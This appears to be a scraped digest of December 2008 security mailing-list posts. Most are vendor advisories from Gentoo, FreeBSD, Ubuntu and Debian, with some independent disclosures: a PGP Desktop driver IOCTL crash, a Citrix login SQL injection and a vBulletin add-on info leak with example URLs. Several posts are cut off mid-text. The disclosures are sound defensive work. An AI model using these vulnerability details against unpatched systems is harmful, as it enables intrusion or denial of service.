Google Chrome Browser (ChromeHTML://) remote parameter injection POC
click me
PGP Desktop 9.0.6 Denial Of Service - ZeroDay
--- Advisory: PGP Desktop 9.0.6 Denial Of Service Vulnerability. Version Affected: PGP Desktop 9.0.6 [Build 6060] (other version could be affected) Component Affected: PGPwded.sys Release Date: Release Date. 23 December ,2008 Description: PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL) and this lead to a Driver Collapse that propagates on the system with a BSOD. Affected IOCTL is 0x80022038. Proof-of-Concept: http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php";>Click Here Credit: Giuseppe 'Evilcry' Bonfa' (Team Lead, www.EvilFingers.com / http://evilcry.netsons.org) Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages. ---
[ GLSA 200812-21 ] ClamAV: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: ClamAV: Multiple vulnerabilities Date: December 23, 2008 Bugs: #245450, #249833 ID: 200812-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two vulnerabilities in ClamAV may allow for the remote execution of arbitrary code or a Denial of Service. Background == Clam AntiVirus is a free anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-antivirus/clamav < 0.94.2 >= 0.94.2 Description === Moritz Jodeit reported an off-by-one error within the get_unicode_name() function in libclamav/vba_extract.c when processing VBA project files (CVE-2008-5050). Ilja van Sprundel reported an infinite recursion error within the cli_check_jpeg_exploit() function in libclamav/special.c when processing JPEG files (CVE-2008-5314). Impact == A remote attacker could send a specially crafted VBA or JPEG file to the clamd daemon, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.94.2" References == [ 1 ] CVE-2008-5050 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5050 [ 2 ] CVE-2008-5314 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5314 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-21.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 200812-24 ] VLC: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: VLC: Multiple vulnerabilities Date: December 24, 2008 Bugs: #245774, #249391 ID: 200812-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in VLC may lead to the remote execution of arbitrary code. Background == VLC is a cross-platform media player and streaming server. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-video/vlc < 0.9.8a >= 0.9.8a Description === Tobias Klein reported the following vulnerabilities: * A stack-based buffer overflow when processing CUE image files in modules/access/vcd/cdrom.c (CVE-2008-5032). * A stack-based buffer overflow when processing RealText (.rt) subtitle files in the ParseRealText() function in modules/demux/subtitle.c (CVE-2008-5036). * An integer overflow when processing RealMedia (.rm) files in the ReadRealIndex() function in real.c in the Real demuxer plugin, leading to a heap-based buffer overflow (CVE-2008-5276). Impact == A remote attacker could entice a user to open a specially crafted CUE image file, RealMedia file or RealText subtitle file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All VLC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/vlc-0.9.8a" References == [ 1 ] CVE-2008-5032 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5032 [ 2 ] CVE-2008-5036 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5036 [ 3 ] CVE-2008-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5276 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-24.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
FreeBSD Security Advisory FreeBSD-SA-08:12.ftpd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-08:12.ftpd Security Advisory The FreeBSD Project Topic: Cross-site request forgery in ftpd(8) Category: core Module: ftpd Announced: 2008-12-23 Credits:Maksymilian Arciemowicz Affects:All supported versions of FreeBSD. Corrected: 2008-12-23 01:23:09 UTC (RELENG_7, 7.1-PRERELEASE) 2008-12-23 01:23:09 UTC (RELENG_7_1, 7.1-RC2) 2008-12-23 01:23:09 UTC (RELENG_7_0, 7.0-RELEASE-p7) 2008-12-23 01:23:09 UTC (RELENG_6, 6.4-STABLE) 2008-12-23 01:23:09 UTC (RELENG_6_4, 6.4-RELEASE-p1) 2008-12-23 01:23:09 UTC (RELENG_6_3, 6.3-RELEASE-p7) CVE Name: CVE-2008-4247 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit http://security.FreeBSD.org/>. I. Background ftpd(8) is a general-purpose implementation of File Transfer Protocol (FTP) server that is shipped with the FreeBSD base system. It is not enabled in default installations but can be enabled as either an inetd(8) server, or a standard-alone server. A cross-site request forgery attack is a type of malicious exploit that is mainly targeted to a web browser, by tricking a user trusted by the site into visiting a specially crafted URL, which in turn executes a command which performs some privileged operations on behalf of the trusted user on the victim site. II. Problem Description The ftpd(8) server splits long commands into several requests. This may result in the server executing a command which is hidden inside another very long command. III. Impact This could, with a specifically crafted command, be used in a cross-site request forgery attack. FreeBSD systems running ftpd(8) server could act as a point of privilege escalation in an attack against users using web browser to access trusted FTP sites. IV. Workaround No workaround is available, but systems not running FTP servers are not vulnerable. Systems not running the FreeBSD ftp(8) server are not affected, but users of other ftp daemons are advised to take care since several other ftp daemons are known to have related bugs. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the RELENG_7_1, RELENG_7_0, RELENG_6_4, or RELENG_6_3 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 6.3, 6.4, 7.0, and 7.1 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-08:12/ftpd.patch # fetch http://security.FreeBSD.org/patches/SA-08:12/ftpd.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch # cd /usr/src/libexec/ftpd # make obj && make depend && make && make install VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. CVS: Branch Revision Path - - RELENG_6 src/libexec/ftpd/ftpcmd.y 1.64.2.3 src/libexec/ftpd/extern.h 1.19.14.1 src/libexec/ftpd/ftpd.c 1.206.2.4 RELENG_6_4 src/UPDATING 1.416.2.40.2.4 src/sys/conf/newvers.sh 1.69.2.18.2.7 src/libexec/ftpd/ftpcmd.y 1.64.2.2.4.2 src/libexec/ftpd/extern.h 1.19.30.2 src/libexec/ftpd/ftpd.c 1.206.2.3.4.2 RELENG_6_3 src/UPDATING1.416.2.37.2.12 src/sys/conf/newvers.sh 1.69.2.15.2.11 src/libexec/ftpd/ftpcmd.y 1.64.2.2.2.1 src/libexec/ftpd/extern.h 1.19.26.1 src/libexec/ftpd/ftpd.c 1.206.2.3.2.1 RELENG_7 src/libexec/ftpd/ftpcmd.y 1.66.2.1 src/libexec/ftpd/extern.h 1.19.24.1 src/libexec/ftpd/ftpd.c 1.212.2.1 RELENG_7_1 src/UPDATING 1.507.2.13.2.2 src/libexec/ftpd/ftpcmd.y 1.66.6.2 src/libexec/ftpd/extern.h 1.19.32.2 src/libexec/ftpd/ftpd.c
[ GLSA 200812-22 ] Ampache: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Ampache: Insecure temporary file usage Date: December 23, 2008 Bugs: #237483 ID: 200812-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in Ampache, allowing for symlink attacks. Background == Ampache is a PHP based tool for managing, updating and playing audio files via a web interface. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/ampache < 3.4.3 >= 3.4.3 Description === Dmitry E. Oboukhov reported an insecure temporary file usage within the gather-messages.sh script. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Ampache users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/ampache-3.4.3" References == [ 1 ] CVE-2008-3929 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3929 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
Personal Sticky Threads v1.0.3c vbulletin Add-on problem
Personal Sticky Threads is an addon for vbulletin that allows users to create personal stickies. There appears to be a small problem when toggling the personal sticky on a thread you do not have persmission to access. If I am denied persmission to: http://forums.somesite.com/showthread.php?t=7 Toggling personal stickies for the thread to on I am able to view the thread title, author, and pages: http://forums.somesite.com/misc.php?do=togglestick&thread=47 This does not allow me access to the thread but does display information not intended to be viewed by me :)
FRHACK Registration open (Christmas offer)
Hi list, ### > FRHACK: IT Security Conference, France By Hackers, For Hackers! http://www.frhack.org ### FRHACK registrations are open with a special Christmas offer (available until January 1st 2009) http://frhack.org/register.html Call For Papers & Trainings is open: http://frhack.org/cfp.html We need sponsors! If you can provide or offer money, materials, devices, goodies, and/or alcohol, please contact us at: frhack-sponsor @ frhack.org Thanks - Best regards & Take care. Merry Christmas and Hacky New Year! Jerome Athias FRHACK Founder and Main organizer http://www.frhack.org
[ GLSA 200812-23 ] Imlib2: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Imlib2: User-assisted execution of arbitrary code Date: December 23, 2008 Bugs: #248057 ID: 200812-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow vulnerability has been discovered in Imlib2. Background == Imlib2 is replacement library from the Enlightenment project for libraries like libXpm. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 media-libs/imlib2 < 1.4.2-r1 >= 1.4.2-r1 Description === Julien Danjou reported a pointer arithmetic error and a heap-based buffer overflow within the load() function of the XPM image loader. Impact == A remote attacker could entice a user to process a specially crafted XPM image, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Imlib2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/imlib2-1.4.2-r1" References == [ 1 ] CVE-2008-5187 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5187 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-23.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[USN-698-3] Nagios vulnerabilities
=== Ubuntu Security Notice USN-698-3 December 23, 2008 nagios2 vulnerabilities CVE-2008-5027, CVE-2008-5028 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: nagios2 2.11-1ubuntu1.4 After a standard system upgrade you need to restart Nagios to effect the necessary changes. Details follow: It was discovered that Nagios was vulnerable to a Cross-site request forgery (CSRF) vulnerability. If an authenticated nagios user were tricked into clicking a link on a specially crafted web page, an attacker could trigger commands to be processed by Nagios and execute arbitrary programs. This update alters Nagios behaviour by disabling submission of CMD_CHANGE commands. (CVE-2008-5028) It was discovered that Nagios did not properly parse commands submitted using the web interface. An authenticated user could use a custom form or a browser addon to bypass security restrictions and submit unauthorized commands. (CVE-2008-5027) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4.diff.gz Size/MD5:37439 1e9c238bb21704f42d6275c31cf99108 http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4.dsc Size/MD5: 1174 99b9d7ca524be867d538f8f39d52f0cf http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11.orig.tar.gz Size/MD5: 1741962 058c1f4829de748b42da1b584941 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-common_2.11-1ubuntu1.4_all.deb Size/MD5:61506 c4f5c96b1c8be0e58c362eb005efba9c http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-doc_2.11-1ubuntu1.4_all.deb Size/MD5: 1135002 0515ced55e66978706203bdac4055b39 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_amd64.deb Size/MD5: 1640150 d23994c62750473a55138f10935318b6 http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_amd64.deb Size/MD5: 1106218 d2ca0e16009ae6738cae6efd29f243df i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_i386.deb Size/MD5: 1552138 4a165fc1202e3dcc4c7af4eeaa8f14cb http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_i386.deb Size/MD5: 987174 73ba6b8faef90259a965ad3c2aee176e lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_lpia.deb Size/MD5: 1586750 161d8bbc1d2f8251aa0888c326152763 http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_lpia.deb Size/MD5: 999124 984199f0814041fb1d3be332c78a1084 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_powerpc.deb Size/MD5: 1609376 fc3975c98bf065371fd8a0230d1007c5 http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_powerpc.deb Size/MD5: 1109530 a5e36a48935587ccfc565376a5ea58fa sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_sparc.deb Size/MD5: 1448326 2fc971f58d9891abd1d2babe018742ef http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_sparc.deb Size/MD5: 989588 158c615af339c126f07fcc8b3e05480a signature.asc Description: This is a digitally signed message part
[SECURITY] [DSA 1688-2] New courier-authlib packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1688-2 secur...@debian.org http://www.debian.org/security/ Steffen Joeris December 22, 2008 http://www.debian.org/security/faq - Package: courier-authlib Vulnerability : SQL injection Problem type : local/remote XXX Debian-specific: no CVE Id(s) : CVE-2008-2380 CVE-2008-2667 The update of courier-authlib in DSA 1688-1 caused a regression with setups that do not use mail addresses for authentification. This update fixes this regression. For reference, the full advisory text is below. Two SQL injection vulnerabilities have beein found in courier-authlib, the courier authentification library. The MySQL database interface used insufficient escaping mechanisms when constructing SQL statements, leading to SQL injection vulnerabilities if certain charsets are used (CVE-2008-2380). A similar issue affects the PostgreSQL database interface (CVE-2008-2667). For the stable distribution (etch), these problems have been fixed in version 0.58-4+etch3. For the testing distribution (lenny) and the unstable distribution (sid), these problems have been fixed in version 0.61.0-1+lenny1. We recommend that you upgrade your courier-authlib packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib_0.58-4+etch3.dsc Size/MD5 checksum: 970 eea6bc2a491339d1b06f0d9891906a4f http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib_0.58.orig.tar.gz Size/MD5 checksum: 3342115 75b5b2b72d550048ed1b29e687a1a60d http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib_0.58-4+etch3.diff.gz Size/MD5 checksum:44339 c051936ba955b33ac17bed1a7a062ed6 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-dev_0.58-4+etch3_alpha.deb Size/MD5 checksum: 150150 c1fb3322ef09b7e5592cdb2e0e972e8b http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authdaemon_0.58-4+etch3_alpha.deb Size/MD5 checksum: 6982 fdcfcee4cf7e92463d80fc52c31544c6 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-pipe_0.58-4+etch3_alpha.deb Size/MD5 checksum: 8958 d0d7c0c186dc70bf163fb56efdac13e0 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib_0.58-4+etch3_alpha.deb Size/MD5 checksum:92768 ad72b16c890b88f5878b044ba634d743 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-ldap_0.58-4+etch3_alpha.deb Size/MD5 checksum:23274 072c28b73f51ec0c0853d2235cc43f7a http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-postgresql_0.58-4+etch3_alpha.deb Size/MD5 checksum:20456 9946cb154a436ad185e6ac59d219ee0d http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-mysql_0.58-4+etch3_alpha.deb Size/MD5 checksum:20384 add1d85c7f9f1f951110112e57dd941c http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-userdb_0.58-4+etch3_alpha.deb Size/MD5 checksum:39140 eb641b37baca55b34824e6ccc9123604 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-dev_0.58-4+etch3_amd64.deb Size/MD5 checksum: 111930 9eadcaae493d99804507584da9a84ed3 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-ldap_0.58-4+etch3_amd64.deb Size/MD5 checksum:22290 82ddefca4a28ee7b7138b769bdf70a46 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-pipe_0.58-4+etch3_amd64.deb Size/MD5 checksum: 8404 17f359e16622de5b346c4b6ec21b46d5 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-userdb_0.58-4+etch3_amd64.deb Size/MD5 checksum:34396 3db1718272c4bd67cd9afb61176d6b93 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib_0.58-4+etch3_amd64.deb Size/MD5 checksum:81536 13269dedb780975742c82e8b132fc1e8 http://security.debian.org/pool/updates/main/c/courier-authlib/courier-authlib-mysql_0.58-4+etch3_amd64.deb Size/MD5 checksum:20070 0a0f9a90f
[USN-700-1] Perl vulnerabilities
=== Ubuntu Security Notice USN-700-1 December 24, 2008 libarchive-tar-perl, perl vulnerabilities CVE-2007-4829, CVE-2008-1927, CVE-2008-5302, CVE-2008-5303 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libarchive-tar-perl 1.26-2ubuntu0.1 libperl5.8 5.8.7-10ubuntu1.2 Ubuntu 7.10: libarchive-tar-perl 1.31-1ubuntu0.1 libperl5.8 5.8.8-7ubuntu3.4 perl-modules5.8.8-7ubuntu3.4 Ubuntu 8.04 LTS: libarchive-tar-perl 1.36-1ubuntu0.1 libperl5.8 5.8.8-12ubuntu0.3 perl-modules5.8.8-12ubuntu0.3 Ubuntu 8.10: perl-modules5.10.0-11.1ubuntu2.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jonathan Smith discovered that the Archive::Tar Perl module did not correctly handle symlinks when extracting archives. If a user or automated system were tricked into opening a specially crafted tar file, a remote attacker could over-write arbitrary files. (CVE-2007-4829) Tavis Ormandy and Will Drewry discovered that Perl did not correctly handle certain utf8 characters in regular expressions. If a user or automated system were tricked into using a specially crafted expression, a remote attacker could crash the application, leading to a denial of service. Ubuntu 8.10 was not affected by this issue. (CVE-2008-1927) A race condition was discovered in the File::Path Perl module's rmtree function. If a local attacker successfully raced another user's call of rmtree, they could create arbitrary setuid binaries. Ubuntu 6.06 and 8.10 were not affected by this issue. (CVE-2008-5302) A race condition was discovered in the File::Path Perl module's rmtree function. If a local attacker successfully raced another user's call of rmtree, they could delete arbitrary files. Ubuntu 6.06 was not affected by this issue. (CVE-2008-5303) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/liba/libarchive-tar-perl/libarchive-tar-perl_1.26-2ubuntu0.1.diff.gz Size/MD5: 8837 c953b58878f093a044810e93df655838 http://security.ubuntu.com/ubuntu/pool/main/liba/libarchive-tar-perl/libarchive-tar-perl_1.26-2ubuntu0.1.dsc Size/MD5: 714 8129a906b68bc1ebeda90ba141fbba82 http://security.ubuntu.com/ubuntu/pool/main/liba/libarchive-tar-perl/libarchive-tar-perl_1.26.orig.tar.gz Size/MD5:35070 f649c69d89fdc56b2c5985a672cd941a http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.2.diff.gz Size/MD5: 170064 cfbae74f27b4cc8da11f2741e9984c9a http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.2.dsc Size/MD5: 783 bc48c98dc8ec1021a73b7205cb5dfc63 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7.orig.tar.gz Size/MD5: 12512211 dacefa1fe3c5b6d7bbc334ad94826131 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/liba/libarchive-tar-perl/libarchive-tar-perl_1.26-2ubuntu0.1_all.deb Size/MD5:44768 ea5696c18ac838b739ddfd322a94b102 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.7-10ubuntu1.2_all.deb Size/MD5: 7207574 e453613c119d963da067b43fe3b3e645 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.7-10ubuntu1.2_all.deb Size/MD5: 2325834 a3d3e984f8052f11079667213b6b01ea http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.7-10ubuntu1.2_all.deb Size/MD5:40060 097c64fa302bd9cea19c5ed878b809fd amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.2_amd64.deb Size/MD5: 641018 262d7e8628526d18d88b0186e1e752e3 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.2_amd64.deb Size/MD5: 1012 095f9d5fb34a74e10f6f4bd57010712a http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.2_amd64.deb Size/MD5: 820964 1fe941655784482d3f714dce21666ce6 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.2_amd64.deb Size/MD5:31474 e08eba738fef99eb3faa7249582bf1b0 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.2_amd64.deb Size/MD5: 3978652 28ad13b9d303e0dfc8c2d8680feb8caa http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.2_amd64.deb Size/MD5: 2639818 dd13720935219360f61049b76
DDIVRT-2008-16 Citrix Broadcast Server 6.0 login.asp SQL Injection --- Update for BID 32832
Title - DDIVRT-2008-16 Citrix Broadcast Server 6.0 login.asp SQL Injection Severity High Date Discovered --- October 14, 2008 Discovered By - Digital Defense, Inc. Vulnerability Research Team Credit: Corey LeBleu and r...@b13$ Vulnerability Description - The Citrix Broadcast Server administrative login page is vulnerable to trivial SQL injections via the txtUID HTTP POST parameter. An attacker could leverage this flaw to obtain unauthorized access to the web interface or to extract data from the database via blind SQL injection. Solution Description Citrix has released a patch for this flaw as described in Document ID CTX119315. Digital Defense, Inc. would like that thank Citrix for quickly addressing this security vulnerability. Tested Systems / Software (with versions) -- Windows 2003 with Citrix BCS 6.0 for Citrix Access Gateway. Other versions of the Citrix BCS may be vulnerable. According to Citrix Document ID CTX119315, the Avaya AG250 Broadcast Server 2.0 is also vulnerable to this flaw. Vendor Contact -- Citrix Systems, Inc. www.citrix.com sec...@citrix.com
FreeBSD Security Advisory FreeBSD-SA-08:13.protosw
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-08:13.protoswSecurity Advisory The FreeBSD Project Topic: netgraph / bluetooth privilege escalation Category: core Module: sys_kern Announced: 2008-12-23 Credits:Christer Oberg Affects:All FreeBSD releases Corrected: 2008-12-23 01:23:09 UTC (RELENG_7, 7.1-PRERELEASE) 2008-12-23 01:23:09 UTC (RELENG_7_1, 7.1-RC2) 2008-12-23 01:23:09 UTC (RELENG_7_0, 7.0-RELEASE-p7) 2008-12-23 01:23:09 UTC (RELENG_6, 6.4-STABLE) 2008-12-23 01:23:09 UTC (RELENG_6_4, 6.4-RELEASE-p1) 2008-12-23 01:23:09 UTC (RELENG_6_3, 6.3-RELEASE-p7) For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit http://security.FreeBSD.org/>. I. Background The FreeBSD kernel provides support for a variety of different types of communications sockets, including IPv4, IPv6, ISDN, ATM, routing protocol, link-layer, netgraph(4), and bluetooth sockets. As an early form of object-oriented design, much of the functionality specific to different types of sockets is abstracted via function pointers. II. Problem Description Some function pointers for netgraph and bluetooth sockets are not properly initialized. III. Impact A local user can cause the FreeBSD kernel to execute arbitrary code. This could be used by an attacker directly; or it could be used to gain root privilege or to escape from a jail. IV. Workaround No workaround is available, but systems without local untrusted users are not vulnerable. Furthermore, systems are not vulnerable if they have neither the ng_socket nor ng_bluetooth kernel modules loaded or compiled into the kernel. Systems with the security.jail.socket_unixiproute_only sysctl set to 1 (the default) are only vulnerable if they have local untrusted users outside of jails. If the command # kldstat -v | grep ng_ produces no output, the system is not vulnerable. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the RELENG_7_0, RELENG_6_4, or RELENG_6_3 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 6.3, 6.4, and 7.0 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 6.x] # fetch http://security.FreeBSD.org/patches/SA-08:13/protosw6x.patch # fetch http://security.FreeBSD.org/patches/SA-08:13/protosw6x.patch.asc [FreeBSD 7.x] # fetch http://security.FreeBSD.org/patches/SA-08:13/protosw.patch # fetch http://security.FreeBSD.org/patches/SA-08:13/protosw.patch.asc b) Apply the patch. # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in 